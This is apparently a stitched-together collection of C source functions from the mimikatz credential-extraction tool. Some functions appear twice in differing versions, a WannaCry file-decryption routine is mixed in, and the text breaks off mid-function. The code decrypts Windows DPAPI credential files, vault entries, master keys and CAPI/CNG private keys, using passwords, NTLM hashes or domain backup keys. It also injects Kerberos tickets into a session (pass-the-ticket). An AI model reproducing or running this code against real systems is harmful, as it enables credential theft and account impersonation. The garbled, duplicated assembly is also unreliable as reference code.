NTSTATUS kuhl_m_dpapi_cred(int argc, wchar_t * argv[])
{
PCWSTR infile;
PVOID file, out;
DWORD szFile, szOut;
PKULL_M_CRED_BLOB cred;
if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
{
if(kull_m_file_readData(infile, (PBYTE *) &file, &szFile))
{
kull_m_dpapi_blob_quick_descr(0, ((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blob);
if(kuhl_m_dpapi_unprotect_raw_or_blob(((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blob, ((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blobSize, NULL, argc, argv, NULL, 0, &out, &szOut, L"Decrypting Credential:\n"))
{
if(cred = kull_m_cred_create(out))
{
kull_m_cred_descr(0, cred);
kull_m_cred_delete(cred);
}
LocalFree(out);
}
LocalFree(file);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
}
else PRINT_ERROR(L"Input CRED file needed (/in:file)\n");
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_dpapi_wwan(int argc, wchar_t * argv[])
{
PBYTE pFile, hex, dataOut;
DWORD dwData, lenHex, lenDataOut;
LPWSTR dataU, dataF;
LPCWSTR infile;
PKULL_M_DPAPI_BLOB blob;
if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
{
if(kull_m_file_readData(infile, &pFile, &dwData))
{
if(dataU = kull_m_string_qad_ansi_to_unicode((const char *) pFile))
{
if(kull_m_string_quickxml_simplefind(dataU, L"Name", &dataF))
{
kprintf(L"Profile \'%s\'\n\n", dataF);
LocalFree(dataF);
}
if(kull_m_string_quickxml_simplefind(dataU, L"AccessString", &dataF))
{
kprintf(L" * AccessString : %s\n", dataF);
LocalFree(dataF);
}
if(kull_m_string_quickxml_simplefind(dataU, L"SubscriberID", &dataF))
{
if(kull_m_string_stringToHexBuffer(dataF, &hex, &lenHex))
{
if(blob = kull_m_dpapi_blob_create(hex))
{
kprintf(L"\n");
kull_m_dpapi_blob_descr(0, blob);
if(kuhl_m_dpapi_unprotect_raw_or_blob(hex, lenHex, NULL, argc, argv, NULL, 0, (LPVOID *) &dataOut, &lenDataOut, NULL))
{
kprintf(L" * SubscriberID : ");
kull_m_string_wprintf_hex(dataOut, lenDataOut, 0);
kprintf(L"\n");
kprintf(L"%.*s", lenDataOut / sizeof(wchar_t), dataOut);
LocalFree(dataOut);
}
kull_m_dpapi_blob_delete(blob);
}
LocalFree(hex);
}
LocalFree(dataF);
}
LocalFree(dataU);
}
LocalFree(pFile);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
}
else PRINT_ERROR(L"Input Wwan XML profile needed (/in:file)\n");
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_dpapi_keys_cng(int argc, wchar_t * argv[])
{
PBYTE file;
PVOID out;
DWORD szFile, outLen, cbProperties;
PKULL_M_KEY_CNG_BLOB cngKey;
PKULL_M_KEY_CNG_PROPERTY * properties;
LPCWSTR infile;
PWSTR name;
if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
{
if(kull_m_file_readData(infile, (PBYTE *) &file, &szFile))
{
if(cngKey = kull_m_key_cng_create(file))
{
kull_m_key_cng_descr(0, cngKey);
if(kuhl_m_dpapi_unprotect_raw_or_blob(cngKey->pPrivateProperties, cngKey->dwPrivatePropertiesLen, NULL, argc, argv, KIWI_DPAPI_ENTROPY_CNG_KEY_PROPERTIES, sizeof(KIWI_DPAPI_ENTROPY_CNG_KEY_PROPERTIES), &out, &outLen, L"Decrypting Private Properties:\n"))
{
if(kull_m_key_cng_properties_create(out, outLen, &properties, &cbProperties))
{
kull_m_key_cng_properties_descr(0, properties, cbProperties);
kull_m_key_cng_properties_delete(properties, cbProperties);
}
LocalFree(out);
}
if(kuhl_m_dpapi_unprotect_raw_or_blob(cngKey->pPrivateKey, cngKey->dwPrivateKeyLen, NULL, argc, argv, KIWI_DPAPI_ENTROPY_CNG_KEY_BLOB, sizeof(KIWI_DPAPI_ENTROPY_CNG_KEY_BLOB), &out, &outLen, L"Decrypting Private Key:\n"))
{
kull_m_string_wprintf_hex(out, outLen, 0);kprintf(L"\n");
if(name = (PWSTR) LocalAlloc(LPTR, cngKey->dwNameLen + sizeof(wchar_t)))
{
RtlCopyMemory(name, cngKey->pName, cngKey->dwNameLen);
kuhl_m_crypto_exportRawKeyToFile(out, outLen, TRUE, L"raw", 0, name, TRUE, TRUE);
LocalFree(name);
}
LocalFree(out);
}
kull_m_key_cng_delete(cngKey);
}
LocalFree(file);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
}
else PRINT_ERROR(L"Input CNG private key file needed (/in:file)\n");
return STATUS_SUCCESS;
}
void kuhl_m_kerberos_ptt_file(PCWCHAR filename)
{
PBYTE fileData;
DWORD fileSize;
NTSTATUS status;
if(kull_m_file_readData(filename, &fileData, &fileSize))
{
status = kuhl_m_kerberos_ptt_data(fileData, fileSize);
if(NT_SUCCESS(status))
kprintf(L"OK\n");
else
PRINT_ERROR(L"LsaCallKerberosPackage %08x\n", status);
LocalFree(fileData);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
}
NTSTATUS kuhl_m_kerberos_ptt(int argc, wchar_t * argv[])
{
PBYTE fileData;
DWORD fileSize;
if(argc)
{
if(kull_m_file_readData(argv[argc - 1], &fileData, &fileSize))
{
if(NT_SUCCESS(kuhl_m_kerberos_ptt_data(fileData, fileSize)))
kprintf(L"Ticket \'%s\' successfully submitted for current session\n", argv[0]);
LocalFree(fileData);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
} else PRINT_ERROR(L"Missing argument : ticket filename\n");
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_dpapi_masterkeys(int argc, wchar_t * argv[])
{
PKULL_M_DPAPI_MASTERKEYS masterkeys;
PBYTE buffer;
DWORD szBuffer;
if(argc && kull_m_file_readData(argv[0], &buffer, &szBuffer))
{
if(masterkeys = kull_m_dpapi_masterkeys_create(buffer))
{
kull_m_dpapi_masterkeys_descr(masterkeys);
kull_m_dpapi_masterkeys_delete(masterkeys);
}
LocalFree(buffer);
}
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_dpapi_blob(int argc, wchar_t * argv[])
{
PKULL_M_DPAPI_BLOB blob;
PBYTE buffer;
DWORD szBuffer;
if(argc && kull_m_file_readData(argv[0], &buffer, &szBuffer))
{
if(blob = kull_m_dpapi_blob_create(buffer))
{
kull_m_dpapi_blob_descr(blob);
kull_m_dpapi_blob_delete(blob);
}
LocalFree(buffer);
}
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_dpapi_cred(int argc, wchar_t * argv[])
{
PCWSTR infile;
PVOID file, out;
DWORD szFile, szOut;
BOOL isNT5Cred;
PKULL_M_CRED_BLOB cred;
PKULL_M_CRED_LEGACY_CREDS_BLOB legacyCreds;
if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
{
if(kull_m_file_readData(infile, (PBYTE *) &file, &szFile))
{
isNT5Cred = RtlEqualGuid((PBYTE) file + sizeof(DWORD), &KULL_M_DPAPI_GUID_PROVIDER);
kull_m_dpapi_blob_quick_descr(0, isNT5Cred ? file : ((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blob);
if(kuhl_m_dpapi_unprotect_raw_or_blob(isNT5Cred ? file : ((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blob, isNT5Cred ? szFile : ((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blobSize, NULL, argc, argv, NULL, 0, &out, &szOut, isNT5Cred ? L"Decrypting Legacy Credential(s):\n" : L"Decrypting Credential:\n"))
{
if(isNT5Cred)
{
if(legacyCreds = kull_m_cred_legacy_creds_create(out))
{
kull_m_cred_legacy_creds_descr(0, legacyCreds);
kull_m_cred_legacy_creds_delete(legacyCreds);
}
}
else
{
if(cred = kull_m_cred_create(out))
{
kull_m_cred_descr(0, cred);
kull_m_cred_delete(cred);
}
}
LocalFree(out);
}
LocalFree(file);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
}
else PRINT_ERROR(L"Input CRED file needed (/in:file)\n");
return STATUS_SUCCESS;
}
void rsautil_decryptFileWithKey(HCRYPTPROV hProv, HCRYPTKEY hUserRsaKey, HCRYPTKEY hFreeRsaKey, LPWSTR filename)
{
HCRYPTKEY hUserFileAesKey;
PWANA_FORMAT pbEncData;
PWCHAR p;
DWORD cbEncData, cbRealDataLen, cryptoMode = CRYPT_MODE_CBC;
kprintf(L"File %s -- ", filename);
if(kull_m_file_readData(filename, (PBYTE *) &pbEncData, &cbEncData))
{
if(p = wcsrchr(filename, L'.'))
{
*p = L'\0'; // 'delete' the WNCRY extension
if(pbEncData->magic == WANA_MAGIC)
{
if(CryptDecrypt(hUserRsaKey, 0, TRUE, 0, pbEncData->key, &pbEncData->enc_keysize) || (hFreeRsaKey ? CryptDecrypt(hFreeRsaKey, 0, TRUE, 0, pbEncData->key, &pbEncData->enc_keysize) : FALSE)) // decrypt the raw AES key from your RSA key (from userone of free if present)
{
if(SIMPLE_kull_m_crypto_hkey(hProv, CALG_AES_128, pbEncData->key, pbEncData->enc_keysize, 0, &hUserFileAesKey)) // let's make a AES 128 Windows key from raw bytes
{
if(CryptSetKeyParam(hUserFileAesKey, KP_MODE, (PBYTE) &cryptoMode, 0)) // we'll do CBC
{
cbRealDataLen = cbEncData - FIELD_OFFSET(WANA_FORMAT, data);
if(CryptDecrypt(hUserFileAesKey, 0, FALSE, 0, pbEncData->data, &cbRealDataLen)) // decrypt final data (padding issue, so 'FALSE' arg)
{
if(kull_m_file_writeData(filename, pbEncData->data, (ULONG) pbEncData->qwDataSize))
kprintf(L"OK\n");
else PRINT_ERROR_AUTO(L"kull_m_file_writeData");
}
else PRINT_ERROR_AUTO(L"CryptDecrypt(AES)");
}
CryptDestroyKey(hUserFileAesKey);
}
}
else PRINT_ERROR_AUTO(L"CryptDecrypt(RSA)");
}
else PRINT_ERROR(L"ERROR: WANACRY! magic number not found\n");
}
else PRINT_ERROR(L"ERROR: no \'.\' at the end of the user file ?\n");
LocalFree(pbEncData);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
}
BOOL rsautil_pubkeyfile_to_new_e_n(PCWSTR filename, BIGNUM **e, BIGNUM **n)
{
BOOL status = FALSE;
PBYTE blob;
DWORD cbBlob;
RSA *rsa;
if(kull_m_file_readData(filename, &blob, &cbBlob))
{
if(status = rsautil_pubkeyblob_to_rsa(blob, cbBlob, &rsa))
{
*e = BN_new();
*n = BN_new();
BN_copy(*e, rsa->e);
BN_copy(*n, rsa->n);
RSA_free(rsa);
}
LocalFree(blob);
}
else PRINT_ERROR_AUTO(L"fileutil_readData");
return status;
}
NTSTATUS kuhl_m_kerberos_ptt(int argc, wchar_t * argv[])
{
NTSTATUS status, packageStatus;
PBYTE fileData;
DWORD fileSize, submitSize, responseSize;
PKERB_SUBMIT_TKT_REQUEST pKerbSubmit;
PVOID dumPtr;
if(argc)
{
if(kull_m_file_readData(argv[argc - 1], &fileData, &fileSize))
{
submitSize = sizeof(KERB_SUBMIT_TKT_REQUEST) + fileSize;
if(pKerbSubmit = (PKERB_SUBMIT_TKT_REQUEST) LocalAlloc(LPTR, submitSize))
{
pKerbSubmit->MessageType = KerbSubmitTicketMessage;
pKerbSubmit->KerbCredSize = fileSize;
pKerbSubmit->KerbCredOffset = sizeof(KERB_SUBMIT_TKT_REQUEST);
RtlCopyMemory((PBYTE) pKerbSubmit + pKerbSubmit->KerbCredOffset, fileData, pKerbSubmit->KerbCredSize);
status = LsaCallKerberosPackage(pKerbSubmit, submitSize, &dumPtr, &responseSize, &packageStatus);
if(NT_SUCCESS(status))
{
if(NT_SUCCESS(packageStatus))
kprintf(L"Ticket \'%s\' successfully submitted for current session\n", argv[0]);
else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbSubmitTicketMessage / Package : %08x\n", packageStatus);
}
else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbSubmitTicketMessage : %08x\n", status);
LocalFree(pKerbSubmit);
}
LocalFree(fileData);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
} else PRINT_ERROR(L"Missing argument : ticket filename\n");
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_dpapi_vault(int argc, wchar_t * argv[])
{
PCWSTR inFilePolicy, inFileCred;
PVOID filePolicy, fileCred, out;
DWORD szFilePolicy, szFileCred, szOut, len, i, mode = CRYPT_MODE_CBC;
BYTE aes128[AES_128_KEY_SIZE], aes256[AES_256_KEY_SIZE];
PKULL_M_CRED_VAULT_POLICY vaultPolicy;
PKULL_M_CRED_VAULT_CREDENTIAL vaultCredential;
PKULL_M_CRED_VAULT_CREDENTIAL_ATTRIBUTE attribute;
PKULL_M_CRED_VAULT_CLEAR clear;
PVOID buffer;
BOOL isAttr;
HCRYPTPROV hProv;
HCRYPTKEY hKey;
if(kull_m_string_args_byName(argc, argv, L"cred", &inFileCred, NULL))
{
if(kull_m_file_readData(inFileCred, (PBYTE *) &fileCred, &szFileCred))
{
if(vaultCredential = kull_m_cred_vault_credential_create(fileCred))
{
kull_m_cred_vault_credential_descr(0, vaultCredential);
if(kull_m_string_args_byName(argc, argv, L"policy", &inFilePolicy, NULL))
{
if(kull_m_file_readData(inFilePolicy, (PBYTE *) &filePolicy, &szFilePolicy))
{
if(vaultPolicy = kull_m_cred_vault_policy_create(filePolicy))
{
kull_m_cred_vault_policy_descr(0, vaultPolicy);
if(kuhl_m_dpapi_unprotect_raw_or_blob(vaultPolicy->key->KeyBlob, vaultPolicy->key->dwKeyBlob, NULL, argc, argv, NULL, 0, &out, &szOut, L"Decrypting Policy Keys:\n"))
{
if(kull_m_cred_vault_policy_key(out, szOut, aes128, aes256))
{
kprintf(L" AES128 key: "); kull_m_string_wprintf_hex(aes128, AES_128_KEY_SIZE, 0); kprintf(L"\n");
kprintf(L" AES256 key: "); kull_m_string_wprintf_hex(aes256, AES_256_KEY_SIZE, 0); kprintf(L"\n\n");
if(CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT))
{
for(i = 0; i < vaultCredential->__cbElements; i++)
{
if(attribute = vaultCredential->attributes[i])
{
kprintf(L" > Attribute %u : ", attribute->id);
if(attribute->data && (len = attribute->szData))
{
if(buffer = LocalAlloc(LPTR, len))
{
RtlCopyMemory(buffer, attribute->data, len);
if(kuhl_m_dpapi_vault_key_type(attribute, hProv, aes128, aes256, &hKey, &isAttr))
{
if(CryptDecrypt(hKey, 0, TRUE, 0, (PBYTE) buffer, &len))
{
if(isAttr)
{
kull_m_string_wprintf_hex(buffer, len, 0);
}
else
{
kprintf(L"\n");
if(!attribute->id || (attribute->id == 100))
{
if(clear = kull_m_cred_vault_clear_create(buffer))
{
kull_m_cred_vault_clear_descr(1, clear);
kull_m_cred_vault_clear_delete(clear);
}
}
else kull_m_string_wprintf_hex(buffer, len, 1 | (16 << 16));
kprintf(L"\n");
}
}
else PRINT_ERROR_AUTO(L"CryptDecrypt");
}
LocalFree(buffer);
}
}
kprintf(L"\n");
}
}
CryptReleaseContext(hProv, 0);
}
}
LocalFree(out);
}
kull_m_cred_vault_policy_delete(vaultPolicy);
}
LocalFree(filePolicy);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData (policy)");
}
kull_m_cred_vault_credential_delete(vaultCredential);
}
LocalFree(fileCred);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData (cred)");
}
else PRINT_ERROR(L"Input Cred file needed (/cred:file)\n");
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_dpapi_keys_capi(int argc, wchar_t * argv[])
{
PVOID file, out;
PRSA_GENERICKEY_BLOB blob;
DWORD szFile, outLen, szBlob;
PKULL_M_KEY_CAPI_BLOB capiKey;
LPCWSTR infile;
PWSTR name;
if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
{
if(kull_m_file_readData(infile, (PBYTE *) &file, &szFile))
{
if(capiKey = kull_m_key_capi_create(file))
{
kull_m_key_capi_descr(0, capiKey);
if(kuhl_m_dpapi_unprotect_raw_or_blob(capiKey->pSiExportFlag, capiKey->dwSiExportFlagLen, NULL, argc, argv, KIWI_DPAPI_ENTROPY_CAPI_KEY_EXPORTFLAGS, sizeof(KIWI_DPAPI_ENTROPY_CAPI_KEY_EXPORTFLAGS), &out, &outLen, L"Decrypting AT_SIGNATURE Export flags:\n"))
{
kull_m_string_wprintf_hex(out, outLen, 0); kprintf(L"\n");
LocalFree(out);
}
if(kuhl_m_dpapi_unprotect_raw_or_blob(capiKey->pSiPrivateKey, capiKey->dwSiPrivateKeyLen, NULL, argc, argv, NULL, 0, &out, &outLen, L"Decrypting AT_SIGNATURE Private Key:\n"))
{
kull_m_string_wprintf_hex(out, outLen, 0); kprintf(L"\n");
if(kull_m_key_capi_decryptedkey_to_raw(out, outLen, &blob, &szBlob))
{
if(name = kull_m_string_qad_ansi_to_unicode(capiKey->pName))
{
kuhl_m_crypto_exportRawKeyToFile(blob, szBlob, FALSE, L"raw_signature", 0, name, TRUE, TRUE);
LocalFree(name);
}
LocalFree(blob);
}
LocalFree(out);
}
if(kuhl_m_dpapi_unprotect_raw_or_blob(capiKey->pExExportFlag, capiKey->dwExExportFlagLen, NULL, argc, argv, KIWI_DPAPI_ENTROPY_CAPI_KEY_EXPORTFLAGS, sizeof(KIWI_DPAPI_ENTROPY_CAPI_KEY_EXPORTFLAGS), &out, &outLen, L"Decrypting AT_EXCHANGE Export flags:\n"))
{
kull_m_string_wprintf_hex(out, outLen, 0); kprintf(L"\n");
LocalFree(out);
}
if(kuhl_m_dpapi_unprotect_raw_or_blob(capiKey->pExPrivateKey, capiKey->dwExPrivateKeyLen, NULL, argc, argv, NULL, 0, &out, &outLen, L"Decrypting AT_EXCHANGE Private Key:\n"))
{
kull_m_string_wprintf_hex(out, outLen, 0); kprintf(L"\n");
if(kull_m_key_capi_decryptedkey_to_raw(out, outLen, &blob, &szBlob))
{
if(name = kull_m_string_qad_ansi_to_unicode(capiKey->pName))
{
kuhl_m_crypto_exportRawKeyToFile(blob, szBlob, FALSE, L"raw_exchange", 0, name, TRUE, TRUE);
LocalFree(name);
}
LocalFree(blob);
}
LocalFree(out);
}
kull_m_key_capi_delete(capiKey);
}
LocalFree(file);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
}
else PRINT_ERROR(L"Input CAPI private key file needed (/in:file)\n");
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_dpapi_masterkey(int argc, wchar_t * argv[])
{
PKULL_M_DPAPI_MASTERKEYS masterkeys;
PBYTE buffer;
PPVK_FILE_HDR pvkBuffer;
DWORD szBuffer, szPvkBuffer;
LPCWSTR szIn = NULL, szSid = NULL, szPassword = NULL, szHash = NULL, szSystem = NULL, szDomainpvk = NULL;
BOOL isProtected = kull_m_string_args_byName(argc, argv, L"protected", NULL, NULL);
PWSTR convertedSid = NULL;
PSID pSid;
PBYTE pHash = NULL, pSystem = NULL;
DWORD cbHash = 0, cbSystem = 0;
PVOID output;
DWORD cbOutput;
if(kull_m_string_args_byName(argc, argv, L"in", &szIn, NULL))
{
kull_m_string_args_byName(argc, argv, L"sid", &szSid, NULL);
kull_m_string_args_byName(argc, argv, L"password", &szPassword, NULL);
kull_m_string_args_byName(argc, argv, L"hash", &szHash, NULL);
kull_m_string_args_byName(argc, argv, L"system", &szSystem, NULL);
kull_m_string_args_byName(argc, argv, L"domainpvk", &szDomainpvk, NULL);
if(kull_m_file_readData(szIn, &buffer, &szBuffer))
{
if(masterkeys = kull_m_dpapi_masterkeys_create(buffer))
{
//kull_m_dpapi_masterkeys_descr(masterkeys);
if(szSid)
{
if(ConvertStringSidToSid(szSid, &pSid))
{
ConvertSidToStringSid(pSid, &convertedSid);
LocalFree(pSid);
}
else PRINT_ERROR_AUTO(L"ConvertStringSidToSid");
}
if(szHash)
kull_m_string_stringToHexBuffer(szHash, &pHash, &cbHash);
if(szSystem)
kull_m_string_stringToHexBuffer(szSystem, &pSystem, &cbSystem);
if(convertedSid)
{
if(masterkeys->MasterKey && masterkeys->dwMasterKeyLen)
{
if(szPassword)
{
kprintf(L"\n[masterkey] with password: %s (%s user)\n", szPassword, isProtected ? L"protected" : L"normal");
if(kull_m_dpapi_unprotect_masterkey_with_password(masterkeys->dwFlags, masterkeys->MasterKey, szPassword, convertedSid, isProtected, &output, &cbOutput))
kuhl_m_dpapi_displayInfosAndFree(output, cbOutput, NULL);
else PRINT_ERROR(L"kull_m_dpapi_unprotect_masterkey_with_password\n");
}
if(pHash)
{
kprintf(L"\n[masterkey] with hash: "); kull_m_string_wprintf_hex(pHash, cbHash, 0);
if(cbHash == LM_NTLM_HASH_LENGTH)
kprintf(L" (ntlm type)\n");
else if(cbHash == SHA_DIGEST_LENGTH)
kprintf(L" (sha1 type)\n");
else
kprintf(L" (?)\n");
if(kull_m_dpapi_unprotect_masterkey_with_userHash(masterkeys->MasterKey, pHash, cbHash, convertedSid, &output, &cbOutput))
kuhl_m_dpapi_displayInfosAndFree(output, cbOutput, NULL);
else PRINT_ERROR(L"kull_m_dpapi_unprotect_masterkey_with_userHash\n");
}
}
if(masterkeys->BackupKey && masterkeys->dwBackupKeyLen)
{
if(!(masterkeys->dwFlags & 1) || (pSystem && cbSystem))
{
kprintf(L"\n[backupkey] %s DPAPI_SYSTEM: ", pSystem ? L"with" : L"without");
if(pSystem)
kull_m_string_wprintf_hex(pSystem, cbSystem, 0);
kprintf(L"\n");
if(kull_m_dpapi_unprotect_backupkey_with_secret(masterkeys->dwFlags, masterkeys->BackupKey, convertedSid, pSystem, cbSystem, &output, &cbOutput))
kuhl_m_dpapi_displayInfosAndFree(output, cbOutput, NULL);
else PRINT_ERROR(L"kull_m_dpapi_unprotect_backupkey_with_secret\n");
}
}
LocalFree(convertedSid);
}
if(pHash)
LocalFree(pHash);
if(pSystem)
LocalFree(pSystem);
if(szDomainpvk && masterkeys->DomainKey && masterkeys->dwDomainKeyLen)
{
kprintf(L"\n[domainkey] with RSA private key\n");
if(kull_m_file_readData(szDomainpvk, (PBYTE *) &pvkBuffer, &szPvkBuffer))
{
if(kull_m_dpapi_unprotect_domainkey_with_key(masterkeys->DomainKey, (PBYTE) pvkBuffer + sizeof(PVK_FILE_HDR), pvkBuffer->cbPvk, &output, &cbOutput, &pSid))
kuhl_m_dpapi_displayInfosAndFree(output, cbOutput, pSid);
else PRINT_ERROR(L"kull_m_dpapi_unprotect_domainkey_with_key\n");
LocalFree(pvkBuffer);
}
}
kull_m_dpapi_masterkeys_delete(masterkeys);
}
LocalFree(buffer);
}
}
else PRINT_ERROR(L"Input masterkeys file needed (/in:file)\n");
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_dpapi_unprotect(int argc, wchar_t * argv[])
{
DATA_BLOB dataIn, dataOut, dataEntropy = {0, NULL};
PKULL_M_DPAPI_BLOB blob;
PCWSTR szEntropy, outfile, infile, szMasterkey, szPassword = NULL;
PWSTR description = NULL;
CRYPTPROTECT_PROMPTSTRUCT promptStructure = {sizeof(CRYPTPROTECT_PROMPTSTRUCT), CRYPTPROTECT_PROMPT_ON_PROTECT | CRYPTPROTECT_PROMPT_ON_UNPROTECT | CRYPTPROTECT_PROMPT_STRONG, NULL, MIMIKATZ}, *pPrompt;
DWORD flags = 0;
UNICODE_STRING uString;
BOOL statusDecrypt = FALSE;
PBYTE masterkey = NULL;
DWORD masterkeyLen = 0;
if(kull_m_string_args_byName(argc, argv, L"entropy", &szEntropy, NULL))
kull_m_string_stringToHexBuffer(szEntropy, &dataEntropy.pbData, &dataEntropy.cbData);
if(kull_m_string_args_byName(argc, argv, L"machine", NULL, NULL))
flags |= CRYPTPROTECT_LOCAL_MACHINE;
pPrompt = kull_m_string_args_byName(argc, argv, L"prompt", NULL, NULL) ? &promptStructure : NULL;
if(kull_m_string_args_byName(argc, argv, L"masterkey", &szMasterkey, NULL))
kull_m_string_stringToHexBuffer(szMasterkey, &masterkey, &masterkeyLen);
kull_m_string_args_byName(argc, argv, L"password", &szPassword, NULL);
kprintf(L"\nflags : "); kull_m_dpapi_displayProtectionFlags(flags); kprintf(L"\n");
kprintf(L"prompt flags: "); if(pPrompt) kull_m_dpapi_displayPromptFlags(pPrompt->dwPromptFlags); kprintf(L"\n");
kprintf(L"entropy : "); kull_m_string_wprintf_hex(dataEntropy.pbData, dataEntropy.cbData, 0); kprintf(L"\n");
kprintf(L"masterkey : "); kull_m_string_wprintf_hex(masterkey, masterkeyLen, 0); kprintf(L"\n");
kprintf(L"password : %s\n\n", szPassword ? szPassword : L"");
if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
{
if(kull_m_file_readData(infile, &dataIn.pbData, &dataIn.cbData))
{
if(blob = kull_m_dpapi_blob_create(dataIn.pbData))
{
kull_m_dpapi_blob_descr(blob);
if(masterkey && masterkeyLen)
statusDecrypt = kull_m_dpapi_unprotect_blob(blob, masterkey, masterkeyLen, dataEntropy.pbData, dataEntropy.cbData, szPassword, (LPVOID *) &dataOut.pbData, &dataOut.cbData);
else
statusDecrypt = CryptUnprotectData(&dataIn, &description, &dataEntropy, NULL, pPrompt, 0, &dataOut);
if(statusDecrypt)
{
if(description)
{
kprintf(L"description : %s\n", description);
LocalFree(description);
}
if(kull_m_string_args_byName(argc, argv, L"out", &outfile, NULL))
{
if(kull_m_file_writeData(outfile, dataOut.pbData, dataOut.cbData))
kprintf(L"Write to file \'%s\' is OK\n", outfile);
}
else
{
uString.Length = uString.MaximumLength = (USHORT) dataOut.cbData;
uString.Buffer = (PWSTR) dataOut.pbData;
kprintf(L"data - ");
if((uString.Length <= USHRT_MAX) && (kull_m_string_suspectUnicodeString(&uString)))
kprintf(L"text : %s", dataOut.pbData);
else
{
kprintf(L"hex : ");
kull_m_string_wprintf_hex(dataOut.pbData, dataOut.cbData, 1 | (16 << 16));
}
kprintf(L"\n");
}
LocalFree(dataOut.pbData);
}
else if(!masterkey) PRINT_ERROR_AUTO(L"CryptUnprotectData");
kull_m_dpapi_blob_delete(blob);
}
LocalFree(dataIn.pbData);
}
}
if(dataEntropy.pbData)
LocalFree(dataEntropy.pbData);
if(masterkey)
LocalFree(masterkey);
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_kerberos_ccache_enum(int argc, wchar_t * argv[], BOOL isInject, BOOL isSave)
{
PBYTE file, data;
DWORD length, i;
USHORT version;
PKERB_EXTERNAL_NAME principalName; UNICODE_STRING principalRealm;
PKIWI_KERBEROS_TICKET ticket;
PDIRTY_ASN1_SEQUENCE_EASY App_KrbCred;
DWORD App_KrbCred_Size;
wchar_t * saveFilename;
if(argc)
{
if(kull_m_file_readData(argv[0], &file, &length))
{
data = file;
version = _byteswap_ushort(*(PUSHORT) data); data += sizeof(USHORT);
if(version == 0x0504)
{
data += sizeof(USHORT) + _byteswap_ushort(*(PUSHORT) data);
kuhl_m_kerberos_ccache_externalname(&data, &principalName, &principalRealm);
if(principalName)
{
kuhl_m_kerberos_ticket_displayExternalName(L"\nPrincipal : ", principalName, &principalRealm);
for(i = 0; data < (file + length); i++)
{
kprintf(L"\n\nData %u", i);
if(ticket = (PKIWI_KERBEROS_TICKET) LocalAlloc(LPTR, sizeof(KIWI_KERBEROS_TICKET)))
{
kuhl_m_kerberos_ccache_externalname(&data, &ticket->ClientName, &ticket->AltTargetDomainName);
kuhl_m_kerberos_ccache_externalname(&data, &ticket->ServiceName, &ticket->DomainName);
ticket->TargetName = kuhl_m_kerberos_ticket_copyExternalName(ticket->ServiceName);
kull_m_string_copyUnicodeStringBuffer(&ticket->DomainName, &ticket->TargetDomainName);
ticket->KeyType = _byteswap_ushort(*(PUSHORT) data); data += sizeof(USHORT);
ticket->TicketEncType = _byteswap_ushort(*(PUSHORT) data); data += sizeof(USHORT);
ticket->Key.Length = _byteswap_ushort(*(PUSHORT) data); data += sizeof(USHORT);
if(ticket->Key.Length)
if(ticket->Key.Value = (PUCHAR) LocalAlloc(LPTR, ticket->Key.Length))
RtlCopyMemory(ticket->Key.Value, data, ticket->Key.Length);
data += ticket->Key.Length + sizeof(DWORD); // authtime;
kuhl_m_kerberos_ccache_UnixTimeToFileTime(_byteswap_ulong(*(PDWORD) data), &ticket->StartTime); data += sizeof(DWORD); // local ?
kuhl_m_kerberos_ccache_UnixTimeToFileTime(_byteswap_ulong(*(PDWORD) data), &ticket->EndTime); data += sizeof(DWORD);
kuhl_m_kerberos_ccache_UnixTimeToFileTime(_byteswap_ulong(*(PDWORD) data), &ticket->RenewUntil); data += sizeof(DWORD) + sizeof(UCHAR); // skey
ticket->TicketFlags = _byteswap_ulong(*(PDWORD) data); data += sizeof(DWORD);
kuhl_m_kerberos_ccache_skip_struct_with_buffer(&data); // address
kuhl_m_kerberos_ccache_skip_struct_with_buffer(&data); // authdata
ticket->Ticket.Length = _byteswap_ulong(*(PDWORD) data); data += sizeof(DWORD);
ticket->TicketKvno = 2;
if(ticket->Ticket.Length)
if(ticket->Ticket.Value = (PUCHAR) LocalAlloc(LPTR, ticket->Ticket.Length))
RtlCopyMemory(ticket->Ticket.Value, data, ticket->Ticket.Length);
data += ticket->Ticket.Length;
kuhl_m_kerberos_ccache_skip_buffer(&data);
if(!RtlEqualUnicodeString(&usXCACHECONF, &ticket->TargetDomainName, TRUE))
{
kuhl_m_kerberos_ticket_display(ticket, FALSE);
if(isSave || isInject)
{
if(App_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(ticket, TRUE))
{
App_KrbCred_Size = kull_m_asn1_getSize(App_KrbCred);
if(isInject)
{
kprintf(L"\n\t * Injecting ticket : ");
if(NT_SUCCESS(kuhl_m_kerberos_ptt_data(App_KrbCred, App_KrbCred_Size)))
